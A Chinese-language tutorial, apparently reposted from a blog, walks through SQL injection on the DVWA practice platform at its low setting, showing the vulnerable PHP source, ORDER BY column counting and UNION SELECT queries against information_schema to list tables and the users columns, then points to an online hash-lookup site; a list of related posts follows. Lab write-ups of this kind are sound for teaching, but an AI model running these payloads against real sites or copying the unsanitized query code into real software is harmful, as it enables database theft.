DVWA演练平台之SQL注入(全新认识)
1.开启平台,打开页面(low)。
2.测试id参数。
加单引号试试:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 闭合了前面的单引号,所以后面的就需要注释掉。SQL语句注释:①“#” ②“-- ”3.分析源码。
1 <?php 2 3 if(isset($_GET['Submit'])){ 4 5 // Retrieve data 6 7 $id = $_GET['id']; 8 9 $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; 10 $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' ); 11 12 $num = mysql_numrows($result); 13 14 $i = 0; 15 16 while ($i < $num) { 17 18 $first = mysql_result($result,$i,"first_name"); 19 $last = mysql_result($result,$i,"last_name"); 20 21 $html .= '<pre>'; 22 $html .= 'ID: ' . $id . '<br>名字: ' . $first . '<br>姓氏: ' . $last; 23 $html .= '</pre>'; 24 25 $i++; 26 } 27 } 28 ?>
找到其中在数据库执行的SQL语句:
SELECT first_name, last_name FROM users WHERE user_id = '$id'
4.字段数查询。order by 语句 用于根据指定的列对结果集进行排序。在数据库中操作:
order by 后面的数字就是我们猜测的在这个表中的列数,上图表明此表的列数为2。
5.获取显示位
跟数据库一样的:
6.查询关键信息
即是让内置查询函数代替当前的显示位。
version() user() database() @@version_compile_os
7.获取当前表的其他内容(密码)
其实在我们的数据库中还有一个information_schema数据库,这时候就要利用它啦!
information_schema数据库是MySQL自带的,它提供了访问数据库元数据的方式。什么是元数据呢?元数据是关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。
SCHEMATA表:提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表。
TABLES表:提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息。是show tables from schemaname的结果取之此表。
COLUMNS表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.tablename的结果取之此表。
SQL语句查找表名,
SELECT first_name, last_name FROM users WHERE user_id =1
union select table_name,2 from information_schema.tables where table_schema='dvwa';
所以在页面中:
选择users表吧! 二营长,开炮。
SELECT first_name, last_name FROM users WHERE user_id =1 union select column_name,2 from information_schema.columns where table_name='users';
嘻嘻! 现在肯定开打user,password这两列咯。
9.解密
http://www.cmd5.com/
完工!!!
转载于:https://www.cnblogs.com/Risk2S/p/6916145.html
DVWA演练平台之SQL注入(全新认识)相关推荐
- 基于 WebGoat 平台的 SQL 注入攻击
基于 WebGoat 平台的 SQL 注入攻击 扩展功能参考: https://blog.csdn.net/HZC0217/article/details/126790211 使用实例参考: http ...
- DVWA靶场通关(SQL注入)
SQL Injection(SQL注入)概念 就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.具体来说,它是利用现有应用程序,将(恶意 ...
- 自学渗透测试:使用 DVWA 和 SQLmap 探寻 SQL 注入攻击与防范
数据来源 本文仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径.若观众因此作出任何危害网络安全的行为,后果自负,与本人无关. 01 耳熟能详的SQ注入是什么? 关于SQL注入漏洞,维基 ...
- 基于pikachu漏洞平台的 --SQL注入攻击学习与总结
SQL注入攻击 基础知识 常见注释符号 使用示例 pikachu 漏洞联系平台 -- SQL注入 SQL注入攻击流程 注入点类型 数字型注入(POST) 字符型注入(GET) 搜索型注入 XX型注入 ...
- DVWA(7)SQL注入(SQL Injection) LOW-HIGHT 操作记录
今天带来第七期SQL注入操作记录.初次接触DVWA,写下自己的操作记录,希望可以帮助每个刚接触DVWA的新手,同时希望可以提升自己的技术.注:如有操作不当的地方希望可以得到大神指导.交流.也感谢之前查 ...
- kali linux扫描sql注入,Kali Linux系统利用DVWA靶场进测试SQL注入漏洞:
手工盲注:手工盲注分为基于布尔的盲注.基于时间的盲注以及基于报错的盲注,手工盲注步骤:1.判断是否存在注入,注入是字符型还是数字型;2.猜解当前数据库名;3.猜解数据库中表名;4.猜解表中的字段名;5 ...
- DVWA平台漏洞测试与源码分析(一)SQL注入
DVWA平台是初学网络安全者了解十大漏洞的有效途径,此平台收集了当前威胁网络安全的最常见的十大漏洞,并且为各位初学者提供了靶场实验环境,我们可以利用此平台进行各种攻击实验,从而丰富自己对于Web安全的 ...
- web靶机:kali linux 2.0下搭建DVWA渗透测试演练平台
DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序.包含了SQL注入.XSS.盲注等常 ...
- kali dvwa php mysql,kali linux 2.0下搭建DVWA渗透测试演练平台
DVWA (Dam Vulnerable Web Application)DVWA是用PHP+MySQL编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序.包含了SQL注入.XSS.盲注等常 ...
最新文章
- 简单使用XPOSED实现一机多号
- 乐鑫代理启明云端分享|ESP32系列教程之三: VS Code远程连接Linux
- Yann LeCun, Geoffrey E. Hinton, and Yoshua Bengio
- java 线程由浅入深_由浅入深,Java 并发编程中的 Synchronized(一)
- oracle sqlldr详解,sqlldr详解
- 在什么情况下自己应该辞职走人了,而不是等领导下“逐客令”?
- css3直线运动_纯css3实现曲线运动——贝塞尔曲线(cubic-bezier)
- 作为刚開始学习的人应该怎样来学习FPGA
- Function的常用属性和方法
- c++中的队列_C ++中的队列
- ML/DL-复习笔记【七】- 偏差和方差
- 全志A33 Android4.4 RTL8723DS WIFI/BT驱动调试
- linux 卸载skype,在Ubuntu 20.04系统下使用snap和apt安装Skype的方法
- Java讯序_java使用顺序表制作电子通讯录,实现添加,删除和排序的功能.
- Contest chair of English humor speech contest-2013-8-30
- 族蚂建站课堂:域名相关基础内容
- python输出列表的子列表_python切片(获取一个子列表(数组))详解
- python爬虫模板(个人总结)
- 嵌入式毕设分享 stm32人体健康状态检测系统(项目开源)
- c语言程序如下,某C语言程序如下: #include stdio.h void main() { floa.._简答题试题答案...